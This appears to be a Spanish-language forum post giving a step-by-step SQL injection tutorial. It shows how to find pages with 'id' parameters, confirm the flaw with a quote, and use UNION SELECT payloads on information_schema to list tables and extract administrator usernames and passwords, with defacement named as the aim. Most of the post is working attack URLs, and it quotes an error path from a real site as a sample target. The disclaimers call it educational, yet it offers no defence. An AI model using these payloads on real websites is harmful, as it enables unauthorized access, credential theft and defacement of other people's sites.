Gracias al apoyo y ala ayuda interminable de todos tenemos el problema resuelto.
Y para todo aquel que quiera "Aprender a encontrar la vulnerabilidad de una pagina web" Solo para entender,comprender y proteger de otros ataques les invito y me tomo la molestia de explicaros un ataque por Inyección SQL.
Y para todo aquel que quiera "Aprender a encontrar la vulnerabilidad de una pagina web" Solo para entender,comprender y proteger de otros ataques les invito y me tomo la molestia de explicaros un ataque por Inyección SQL.
Citar
Definición de Ataque SQL:
La inyección SQL es el ataque vía web, que aprovecha Errores en la filtración de datos introducidos por el usuario, y que permiten a un atacante, tener control de cierta aplicación.
¿Que es Deface?
Es la modificación de una página web sin autorización del Administrador de la misma.
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Nota: No todas las Paginas son vulnerables. Solo aquellas que por descuido, falta de conocimiento, Contraseñas débiles, errores en el FPT y un largo numero de errores o vulnerabilidades que nos permitan atraves de una inyección conocer el usuario y contraseña de Administración.
Nota2: Este pequeño tutorial es solamente para aquellos que quieran profundizar sus conocimientos sobre seguridad web, no para causar daños a terceros. (Pues esos terceros son programadores web, que al igual que a nosotros les fascina este amplio mundo que es la informática) Asi que no seais Malotes!!!! No me hago responsable, de los fines que hagais, eso queda en la conciencia de cada uno. (PERO EN ESTE PAIS PUEDEN CAERTE VARIOS AÑOS ENTRE REJAS!! Asi que pensarlo dos veces antes de hacer algo.
Para comenzar antes tenemos que buscar con una referencia en nuestro buscador, lo que nos direccionará a una lista de web posiblemente vulnerables (RECUERDA NO TODAS LO SON) al menos no con este método.
.php?id=
.html?id=
(?id=NUMERO)
Para saber si es vulnerable tienes que quitar el numero, y poner '
Ejemplo :
http://www.WEBVICTIMA/noticia.php?id='
Vale es vulnerable. ¿Como lo sabemos? Facil por que nos ha tirado un error que es:
EJEMPLO:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/ioba.med.uva.es/abretusojos/noticia.php on line 7
(Normalmente suelen ser a si)
Ahora hay que quitar el '
y poner lo principal que es:
Código:
-1+union+all+select+0--
Y nos quedaría así:
Código:
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0"
Ahora hay que buscar tablas, para ello hay que ir añadiendo números [ 1,2,3,4,5,6,7,8 .. .. ] hasta que nos tire unos números.
Acontinuacion sacaremos las table name. Poniendo al final de la url:
+from+information_schema.tables--
y coger un numero de los que te ha tirado,y borrar el name y poner table_name. Quedaría a si.
Ejemplo:
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+information_schema.tables--
Ahora siempre al poner la injeccion, te saldrá CHARACTER_SETS que es la primera tabla.
Si te sale CHARACTER_SETS es que todo va bien, ahora tienes que borrar los -- [ Guion , Guion ] y poner:
+limit+1,1--
Ejemplo:
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+information_schema.tables+limit+1,1--
Ahora hay que ir buscando tablas interesantes como; admin, user, root, login, administrator, etc.
En la base de datos, Hay alguna tables que son default, que parecen importantes pero no lo son , esas tables son:
PROFILING,USER_PRIVILEGES,VIEWS.
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+information_schema.tables+limit+12,1--
Ahora ya tenemos la table name de lo que queremos, ara hacemos lo siguiente:
Borramos:
information_schema.tables+limit+18,1--
EJEMPLO
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+
Y despues del
+from+
ponemos la table importante que es: table_usuarios.
Ejemplo:
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,table_name,4,5,6+from+table_usuarios
Ahora ya toca quitar el table_name que hay entre el 2 y el 4. Y poner nombre.
Ejemplo:
AVISO: No siempre es nombre, a veces si no funciona tienes que poner, admin,login,root,adm,administrador,etc.
Ponemos nombre y...
Hay tenemos el username!! Ahora falta la pass
Ahora como ya sabes el username, borra lo que hay entre el 2 y el 4. Y pon:
Código:
concat(nombre,0x3a3a,pass).
Ejemplo:
http://www.WEBVICTIMA/noticia.php?id=-1+union+all+select+0,1,2,concat%28nombre,0x3a3a,pass%29,4,5,6+from+table_usuarios
Si no te funciona, cambia donde pone pass [ concat(nombre,0x3a3a,pass) por clave,password,contraseña,etc.
Si todo va bien.......
Entre el user y pass lo separa 0x3a3a, 0x3a3a es hexadecimal, que significa " :: "
Y bueno asta aquí todo!!
PD: Este tutorial es una mezcla de recopilacion de muchos tutoriales que me han ayudado a conseguir este curioso e interesante ataque
Espero os sirva de ayuda para profundizar vuestros conocimientos
Un saludo
WiseHidden